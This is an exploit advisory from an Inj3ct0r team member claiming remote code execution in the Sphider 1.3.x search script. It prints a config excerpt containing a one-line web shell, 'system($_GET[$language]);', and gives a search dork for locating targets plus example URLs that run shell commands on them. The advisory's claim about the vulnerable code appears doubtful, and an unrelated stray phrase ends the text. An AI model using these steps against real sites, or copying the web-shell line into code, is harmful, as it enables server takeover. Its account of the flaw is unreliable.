======================================================================= # Sphider Script Remote Code Execution ======================================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \__/'__`\/\ \__/'__`\ 0 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 1\ \____/ >> Exploit database separated by exploit 0 0 \/___/type (local, remote, DoS, etc.)1 11 0[+] Site: Inj3ct0r.com0 1[+] Support e-mail: submit[at]inj3ct0r.com1 00 1####################################1 0I'm XroGuE member from Inj3ct0r Team1 1####################################0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ######################################################################## # Name: Sphider Script Remote Code Execution # Vendor: http://www.sphider.eu # Version: 1.3.x # Risk: Hight # Date: 2010-06-05 # Author: XroGuE # Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! # Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com # Home: (-_+) ######################################################################## ######################################################################## [+] Vuln code : settings/conf.php ***************************************************************** /*********************** General settings ***********************/ // Sphider version $version_nr = '1.3.5'; //Language of the search page $language = 'en'; // Template name/directory in templates dir $template = 'standard'; //Administrators email address (logs can be sent there) $admin_email= 'admin@localhost'; // Print spidering results to standard out $print_results= 1; // Temporary directory, this should be readable and writable $tmp_dir = 'tmp'; /*********************** Spider settings ***********************/ // Min words per page required for indexing $min_words_per_page = 10; system($_GET[$language]); ***************************************************************** [+] D0rk :"powered by sphider" [+] Ex: http://[target]/[path]/settings/conf.php?en=[Ev!l] [+] Demo: http://[site]/search/settings/conf.php?en=uname -a ########################################################################
体验盒子
